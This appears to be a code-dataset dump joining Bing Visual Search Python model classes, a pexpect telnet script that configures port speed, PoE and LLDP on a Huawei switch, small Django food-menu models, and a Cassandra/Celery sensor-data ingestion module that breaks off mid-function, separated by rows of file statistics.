'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'job_title': {'key': 'jobTitle', 'type': 'str'},
'twitter_profile': {'key': 'twitterProfile', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Person, self).__init__(**kwargs)
self.job_title = None
self.twitter_profile = None
class Point2D(Intangible):
"""Defines a 2D point with X and Y coordinates.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:param x: Required. The x-coordinate of the point.
:type x: float
:param y: Required. The y-coordinate of the point.
:type y: float
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'x': {'key': 'x', 'type': 'float'},
'y': {'key': 'y', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(Point2D, self).__init__(**kwargs)
self.x = kwargs['x']
self.y = kwargs['y']
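# Usage sketch (editor's addition): a hypothetical helper, not part of the
# generated surface. The required kwargs come straight from the _validation
# maps above; the coordinates are made up and span the whole image in the
# normalized 0.0-1.0 space.
def _example_tag_region():
    corners = [Point2D(x=x, y=y)
               for x, y in ((0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0))]
    quad = NormalizedQuadrilateral(top_left=corners[0], top_right=corners[1],
                                   bottom_right=corners[2], bottom_left=corners[3])
    return ImageTagRegion(query_rectangle=quad, display_rectangle=quad)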
class Query(msrest.serialization.Model):
"""Defines a search query.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param text: Required. The query string. Use this string as the query term in a new search
request.
:type text: str
:ivar display_text: The display version of the query term.
:vartype display_text: str
:ivar web_search_url: The URL that takes the user to the Bing search results page for the
query.
:vartype web_search_url: str
:ivar search_link: The URL that you use to get the results of the related search. Before using
the URL, you must append query parameters as appropriate and include the Ocp-Apim-Subscription-
Key header. Use this URL if you're displaying the results in your own user interface.
Otherwise, use the webSearchUrl URL.
:vartype search_link: str
:ivar thumbnail: The URL to a thumbnail of a related image.
:vartype thumbnail: ~visual_search_client.models.ImageObject
"""
_validation = {
'text': {'required': True},
'display_text': {'readonly': True},
'web_search_url': {'readonly': True},
'search_link': {'readonly': True},
'thumbnail': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'display_text': {'key': 'displayText', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'search_link': {'key': 'searchLink', 'type': 'str'},
'thumbnail': {'key': 'thumbnail', 'type': 'ImageObject'},
}
def __init__(
self,
**kwargs
):
super(Query, self).__init__(**kwargs)
self.text = kwargs['text']
self.display_text = None
self.web_search_url = None
self.search_link = None
self.thumbnail = None
class Recipe(CreativeWork):
"""Defines a cooking recipe.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar cook_time: The amount of time the food takes to cook. For example, PT25M. For information
about the time format, see http://en.wikipedia.org/wiki/ISO_8601#Durations.
:vartype cook_time: str
:ivar prep_time: The amount of time required to prepare the ingredients. For example, PT15M.
For information about the time format, see http://en.wikipedia.org/wiki/ISO_8601#Durations.
:vartype prep_time: str
:ivar total_time: The total amount of time it takes to prepare and cook the recipe. For
example, PT45M. For information about the time format, see
http://en.wikipedia.org/wiki/ISO_8601#Durations.
:vartype total_time: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'cook_time': {'readonly': True},
'prep_time': {'readonly': True},
'total_time': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'cook_time': {'key': 'cookTime', 'type': 'str'},
'prep_time': {'key': 'prepTime', 'type': 'str'},
'total_time': {'key': 'totalTime', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Recipe, self).__init__(**kwargs)
self.cook_time = None
self.prep_time = None
self.total_time = None
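# Sketch (editor's addition): cook_time/prep_time/total_time arrive as ISO 8601
# durations such as 'PT25M'. A minimal stdlib-only parse for the minutes-only
# case (real values may also carry hours, e.g. 'PT1H30M'):
#
#     import re
#     match = re.fullmatch(r'PT(\d+)M', 'PT25M')
#     minutes = int(match.group(1)) if match else None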
class RecipesModule(msrest.serialization.Model):
"""Defines a list of recipes.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: A list of recipes.
:vartype value: list[~visual_search_client.models.Recipe]
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Recipe]'},
}
def __init__(
self,
**kwargs
):
super(RecipesModule, self).__init__(**kwargs)
self.value = None
class RelatedSearchesModule(msrest.serialization.Model):
"""Defines a list of related searches.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: A list of related searches.
:vartype value: list[~visual_search_client.models.Query]
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Query]'},
}
def __init__(
self,
**kwargs
):
super(RelatedSearchesModule, self).__init__(**kwargs)
self.value = None
class StructuredValue(Thing):
"""StructuredValue.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StructuredValue, self).__init__(**kwargs)
class VisualSearchRequest(msrest.serialization.Model):
"""A JSON object that contains information about the image to get insights of. Specify this object only in a knowledgeRequest form data.
    :param image_info: A JSON object that identifies the image to get insights of.
:type image_info: ~visual_search_client.models.ImageInfo
:param knowledge_request: A JSON object containing information about the request, such as
filters, or a description.
:type knowledge_request: ~visual_search_client.models.KnowledgeRequest
"""
_attribute_map = {
'image_info': {'key': 'imageInfo', 'type': 'ImageInfo'},
'knowledge_request': {'key': 'knowledgeRequest', 'type': 'KnowledgeRequest'},
}
def __init__(
self,
**kwargs
):
super(VisualSearchRequest, self).__init__(**kwargs)
self.image_info = kwargs.get('image_info', None)
self.knowledge_request = kwargs.get('knowledge_request', None)
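# Usage sketch (editor's addition): assembling a request body. KnowledgeRequest
# follows the class above; ImageInfo and Filters live elsewhere in this module,
# so the kwargs 'url' and 'site' are assumptions based on the docstrings rather
# than confirmed signatures.
#
#     request = VisualSearchRequest(
#         image_info=ImageInfo(url='https://example.com/photo.jpg'),
#         knowledge_request=KnowledgeRequest(filters=Filters(site='www.bing.com')),
#     )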
| 40.119099
| 271
| 0.611578
| 13,491
| 110,488
| 4.885479
| 0.053814
| 0.041208
| 0.018571
| 0.027674
| 0.809285
| 0.787179
| 0.778941
| 0.753877
| 0.74975
| 0.743878
| 0
| 0.001021
| 0.237447
| 110,488
| 2,753
| 272
| 40.133672
| 0.781254
| 0.483546
| 0
| 0.743976
| 1
| 0
| 0.344387
| 0.003716
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031627
| false
| 0
| 0.001506
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
127c540ca775ec4f4070d88907e7e29e4bff751f
| 3,831
|
py
|
Python
|
fnat_testset/testlib/Huawei3328.py
|
lizhouw-netscout/fnat
|
684958773379a9205857f1932de443ed0c4334a0
|
[
"Apache-2.0"
] | null | null | null |
fnat_testset/testlib/Huawei3328.py
|
lizhouw-netscout/fnat
|
684958773379a9205857f1932de443ed0c4334a0
|
[
"Apache-2.0"
] | null | null | null |
fnat_testset/testlib/Huawei3328.py
|
lizhouw-netscout/fnat
|
684958773379a9205857f1932de443ed0c4334a0
|
[
"Apache-2.0"
] | null | null | null |
import pexpect
class Huawei3328:
    def __init__(self, str_host, str_user=None, str_passwd=None):
        # str_user and str_passwd are accepted for interface symmetry but are
        # currently unused; the switch is assumed to present its '<Quidway>'
        # prompt without a login step.
        self.ipaddr = str_host
        print('Huawei3328')  # debug marker emitted on instantiation
def set_speed_duplex_value(self,port,speed,duplex):
if (speed == 'auto' and duplex == 'auto'):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
            index = child.expect(["<Quidway>", pexpect.TIMEOUT, pexpect.EOF])  # 0 on prompt; TIMEOUT/EOF fall through to the error branch
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('negotiation auto')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
else:
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
            index = child.expect(["<Quidway>", pexpect.TIMEOUT, pexpect.EOF])
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('undo negotiation auto')
child.sendline('speed %s' % speed)
child.sendline('duplex %s' % duplex)
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
        index = child.expect(["<Quidway>", pexpect.TIMEOUT, pexpect.EOF])
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('poe enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_poe_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
        index = child.expect(["<Quidway>", pexpect.TIMEOUT, pexpect.EOF])
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('undo poe enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_enable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
        index = child.expect(["<Quidway>", pexpect.TIMEOUT, pexpect.EOF])
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('lldp enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
def set_lldp_disable(self,port):
child = pexpect.spawn('telnet %s' % self.ipaddr,timeout=30)
        index = child.expect(["<Quidway>", pexpect.TIMEOUT, pexpect.EOF])
if ( index == 0 ):
child.sendline('system-view')
child.sendline('int Ethernet %s' % port)
child.expect('Ether')
child.sendline('undo lldp enable')
child.sendline('quit')
child.sendline('quit')
child.sendline('quit')
else:
print ("telnet login failed, due to TIMEOUT or EOF")
child.close(force=True)
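# Usage sketch (editor's addition): the management address and port identifier
# below are placeholders; running this needs telnet reachability to a switch
# that presents the '<Quidway>' prompt.
if __name__ == '__main__':
    switch = Huawei3328('192.0.2.1')
    switch.set_speed_duplex_value('0/0/1', '100', 'full')  # force 100M full duplex
    switch.set_poe_enable('0/0/1')  # power the attached device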
| 37.194175
| 71
| 0.528322
| 410
| 3,831
| 4.890244
| 0.134146
| 0.246384
| 0.152618
| 0.131671
| 0.874813
| 0.874813
| 0.874813
| 0.874813
| 0.874813
| 0.874813
| 0
| 0.010322
| 0.342469
| 3,831
| 102
| 72
| 37.558824
| 0.785629
| 0
| 0
| 0.793478
| 0
| 0
| 0.193784
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0.01087
| 0.01087
| 0
| 0.086957
| 0.076087
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
128f99f10db94172b49267c111a6a535911f3722
| 507
|
py
|
Python
|
food/models.py
|
Frank1963-mpoyi/Fast-Food-Web-App
|
4dff055c6785708b6bf98bfb5fac13dc61e089bc
|
[
"MIT"
] | null | null | null |
food/models.py
|
Frank1963-mpoyi/Fast-Food-Web-App
|
4dff055c6785708b6bf98bfb5fac13dc61e089bc
|
[
"MIT"
] | null | null | null |
food/models.py
|
Frank1963-mpoyi/Fast-Food-Web-App
|
4dff055c6785708b6bf98bfb5fac13dc61e089bc
|
[
"MIT"
] | null | null | null |
from django.db import models
class Pizza(models.Model):
name = models.CharField(max_length=120)
priceM = models.DecimalField(max_digits=4, decimal_places=2)
priceL = models.DecimalField(max_digits=4, decimal_places=2)
pImage = models.URLField()
class Burger(models.Model):
name = models.CharField(max_length=120)
priceM = models.DecimalField(max_digits=4, decimal_places=2)
priceL = models.DecimalField(max_digits=4, decimal_places=2)
bImage = models.URLField()
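# Usage sketch (editor's addition): creating a menu item from a view or the
# Django shell; values are illustrative. With max_digits=4 and decimal_places=2
# the price fields hold values up to 99.99.
#
#     from decimal import Decimal
#     Pizza.objects.create(name='Margherita', priceM=Decimal('7.50'),
#                          priceL=Decimal('9.99'),
#                          pImage='https://example.com/margherita.jpg')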
| 29.823529
| 64
| 0.731755
| 67
| 507
| 5.38806
| 0.373134
| 0.199446
| 0.232687
| 0.299169
| 0.764543
| 0.764543
| 0.764543
| 0.764543
| 0.764543
| 0.764543
| 0
| 0.032864
| 0.159763
| 507
| 17
| 65
| 29.823529
| 0.814554
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
12f7c3e6b9c591636bf2b34b2fc629208a6099f2
| 71,151
|
py
|
Python
|
cassandra_storage.py
|
SunBurst/hydroview-celery
|
a69e6b5ec755bb91056a30b924e7d7c05386898a
|
[
"MIT"
] | null | null | null |
cassandra_storage.py
|
SunBurst/hydroview-celery
|
a69e6b5ec755bb91056a30b924e7d7c05386898a
|
[
"MIT"
] | null | null | null |
cassandra_storage.py
|
SunBurst/hydroview-celery
|
a69e6b5ec755bb91056a30b924e7d7c05386898a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import argparse
import datetime
import logging.config
import pytz
from campbellsciparser import cr
from tasks import insert_to_daily_single_measurements_by_sensor
from tasks import insert_to_hourly_single_measurements_by_sensor
from tasks import insert_to_thirty_min_single_measurements_by_sensor
from tasks import insert_to_twenty_min_single_measurements_by_sensor
from tasks import insert_to_fifteen_min_single_measurements_by_sensor
from tasks import insert_to_ten_min_single_measurements_by_sensor
from tasks import insert_to_five_min_single_measurements_by_sensor
from tasks import insert_to_one_min_single_measurements_by_sensor
from tasks import insert_to_one_sec_single_measurements_by_sensor
from tasks import insert_to_daily_profile_measurements_by_sensor
from tasks import insert_to_hourly_profile_measurements_by_sensor
from tasks import insert_to_thirty_min_profile_measurements_by_sensor
from tasks import insert_to_twenty_min_profile_measurements_by_sensor
from tasks import insert_to_fifteen_min_profile_measurements_by_sensor
from tasks import insert_to_ten_min_profile_measurements_by_sensor
from tasks import insert_to_five_min_profile_measurements_by_sensor
from tasks import insert_to_one_min_profile_measurements_by_sensor
from tasks import insert_to_one_sec_profile_measurements_by_sensor
import utils
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_CONFIG_PATH = os.path.join(BASE_DIR, 'cfg/appconfig.yaml')
LOGGING_CONFIG_PATH = os.path.join(BASE_DIR, 'cfg/logging.yaml')
logging_conf = utils.load_config(LOGGING_CONFIG_PATH)
logging.config.dictConfig(logging_conf)
logger_info = logging.getLogger('cassandra_storage_info')
logger_debug = logging.getLogger('cassandra_storage_debug')
def process_daily_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_daily_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_daily_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_daily_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
vertical_position = float(row.get(vertical_position_column))
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(day.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_daily_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
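# Sketch of the expected ``file`` mapping (editor's addition, inferred from the
# .get() calls above; every value is illustrative):
#
#     file = {
#         'source': 'profiles',
#         'path': '/data/station1/profiles.dat',
#         'header_row': 0,
#         'first_line_num': 1,
#         'time_zone': 'Europe/Stockholm',
#         'to_utc': True,
#         'time_columns': ['TIMESTAMP'],
#         'parse_time_columns': True,
#         'time_format_args_library': ['%Y-%m-%d %H:%M:%S'],
#         'vertical_position_column': 'Depth',
#         'vertical_position_correction_factor': 0.5,
#         'parameters': {
#             'Temp': {'parameter_id': 'water_temp', 'unit': 'degC',
#                      'sensor_id': 'ctd_1', 'value_type': 'avg_value'},
#         },
#     }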
def process_daily_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(day.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_daily_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_hourly_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_hourly_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_hourly_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_hourly_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
param_data = cr.extract_columns_data(data, "timestamp", vertical_position_column, param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
hour = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
vertical_position = float(row.get(vertical_position_column))
value_type = param_info.get('value_type')
if vertical_position_correction_factor is not None:
vertical_position = utils.round_of_rating(vertical_position, vertical_position_correction_factor)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_hourly_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_hourly_parameters_to_profile_measurements_by_sensor(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
time_columns = file.get('time_columns')
to_utc = file.get('to_utc')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
num_of_new_rows = len(data)
for param, param_info in parameters.items():
parameter_id = param_info.get('parameter_id')
unit = param_info.get('unit')
sensor_id = param_info.get('sensor_id')
value_type = param_info.get('value_type')
vertical_position = float(param_info.get('vertical_position'))
param_data = cr.extract_columns_data(data, "timestamp", param)
param_formatted_data = []
for row in param_data:
ts = row.get('timestamp')
day = datetime.datetime(ts.year, ts.month, ts.day)
year = int(day.strftime("%Y"))
hour = datetime.datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)
min_value, avg_value, max_value = None, None, None
if value_type == 'min_value':
min_value = float(row.get(param))
elif value_type == 'avg_value':
avg_value = float(row.get(param))
elif value_type == 'max_value':
max_value = float(row.get(param))
param_formatted_data.append((sensor_id, parameter_id, 0, year, int(hour.timestamp()) * 1e3, vertical_position, min_value, avg_value, max_value, unit))
insert_to_hourly_profile_measurements_by_sensor.delay(param_formatted_data)
return num_of_new_rows
def process_thirty_min_profile_measurements_by_sensor(station, file):
if file.get('source') == 'profiles':
num_of_new_rows = process_thirty_min_profile_measurements_by_sensor_profile_source(station, file)
elif file.get('source') == 'parameters':
num_of_new_rows = process_thirty_min_parameters_to_profile_measurements_by_sensor(station, file)
else:
raise TypeError("source must be either profiles or parameters, got {}".format(file.get('source')))
return num_of_new_rows
def process_thirty_min_profile_measurements_by_sensor_profile_source(station, file):
path=file.get('path')
#sensor_id = file.get('sensor_id')
header_row=file.get('header_row')
first_line_num = file.get('first_line_num', 0)
time_format_args_library = file.get('time_format_args_library')
time_zone = file.get('time_zone')
to_utc = file.get('to_utc')
vertical_position_column = file.get('vertical_position_column')
vertical_position_correction_factor = file.get('vertical_position_correction_factor')
time_columns = file.get('time_columns')
parse_time_columns = file.get('parse_time_columns')
parameters = file.get('parameters')
logger_debug.debug(file)
data = cr.read_table_data(infile_path=path, header_row=header_row, first_line_num=first_line_num, parse_time_columns=parse_time_columns, time_zone=time_zone, time_format_args_library=time_format_args_library, time_parsed_column="timestamp", time_columns=time_columns, to_utc=to_utc)
